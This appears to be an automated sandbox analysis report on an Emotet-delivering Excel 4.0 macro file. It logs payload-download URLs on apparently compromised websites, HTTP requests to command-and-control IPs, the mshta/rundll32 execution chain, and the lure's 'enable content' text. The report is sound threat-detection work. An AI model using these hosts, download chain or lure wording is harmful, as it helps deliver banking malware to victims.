                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://umanostudio.com/wp-admin
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/PE3
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weddingbandsirelandjbk.c
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weddingbandsirelandjbk.com/hgsynt2/o/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weddingbandsirelandjbk.com/hgsynt2/o/PE3
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.yeald.finance
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.yeald.finance/wp-adm
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.yeald.finance/wp-admin/1WgPRm/
                            Source: powershell.exe, 00000006.00000002.674504830.0000000003705000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.yeald.finance/wp-admin/1WgPRm/PE3
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: www.yeald.finance
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: global trafficHTTP traffic detected: GET /wp-admin/1WgPRm/ HTTP/1.1Host: www.yeald.financeConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /zzx/ccv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /zzx/ccv/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: mshta.exe, 00000004.00000002.433720521.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000002.433720521.0000000003130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: powershell.exe, 00000006.00000002.672134847.000000000029F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.672280247.000000000041C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            E-Banking Fraud

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 12.2.rundll32.exe.9c0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f90000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.a20000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2b60000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2b60000.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.7e0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3660000.28.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2790000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.760000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.300000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.bf0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.c20000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c60000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2dc0000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.25c0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2730000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2790000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2850000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2730000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d80000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.300000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c60000.15.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2b90000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2760000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.24f0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2aa0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3690000.29.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2340000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f50000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3660000.28.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.25c0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.9f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f20000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2aa0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d50000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2eb0000.22.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2820000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2f90000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.bc0000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f90000.25.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.bc0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.910000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.900000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.9f0000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c60000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.870000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.c20000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e90000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2410000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f10000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f50000.24.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.22b0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.900000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d20000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2eb0000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.790000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2ad0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.760000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.bf0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2880000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2ff0000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2ad0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.cf0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2dc0000.20.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d20000.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2850000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.25f0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2fc0000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.c60000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.bc0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.870000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2cf0000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.bc0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.538615152.0000000002850000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.496653771.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494317741.0000000002F11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673473149.0000000002FC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672675374.0000000000CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493631688.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672831223.0000000002881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.541336124.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493871437.0000000000BF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673078532.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.496375881.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.541752522.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672794567.0000000002790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672749382.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493984139.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672982289.0000000002B91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672961471.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494455991.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538520592.0000000000BF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673602256.0000000003660000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673105429.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538257691.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673360837.0000000002F21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673205255.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538139872.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494009099.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673030786.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672529691.0000000000911000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672081662.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673507519.0000000002FF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494267369.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672772312.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538439653.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673316318.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673391096.0000000002F50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538498842.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673131902.0000000002D51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672329422.00000000007E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.447160166.0000000000760000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493959169.0000000002341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672931992.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494193723.00000000025F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538417405.00000000009C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494121481.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.541212880.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494079905.00000000024F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538540998.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673171132.0000000002D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672613597.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672004438.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493846362.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538682957.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538459946.0000000000A21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493656518.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.493927485.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673263211.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673700095.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673435114.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538786600.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538736284.0000000002F91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538591662.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672103586.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538065858.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672388917.0000000000870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673628550.0000000003691000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.494040925.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.538366137.0000000000900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\Public\Documents\ssd.dll, type: DROPPED

                            System Summary

                            barindex
                            Found malicious Excel 4.0 Macro
                            Source: imedpub.com_10.xlsMacro extractor: Sheet: Macro1 contains: mshta
                            Source: imedpub.com_10.xlsMacro extractor: Sheet: Macro1 contains: mshta
                            Malicious sample detected (through community Yara rule)
                            Source: imedpub.com_10.xls, type: SAMPLEMatched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
                            Source: C:\Users\user\Desktop\imedpub.com_10.xls, type: DROPPEDMatched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 14 Previewing is not available for protected documents. 15 16
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 15 16 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23 24 25 26 27 28 2
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23 G
                            Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. 11 12 13 14 , . Previewing is not available for protected documents. 15
                            Source: Screenshot number: 8Screenshot OCR: protected documents. 15 16 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 17 18 19 20 21 22 23 G) I I 24 25 26 27
                            Document contains OLE streams with names of living off the land binaries
                            Source: imedpub.com_10.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. 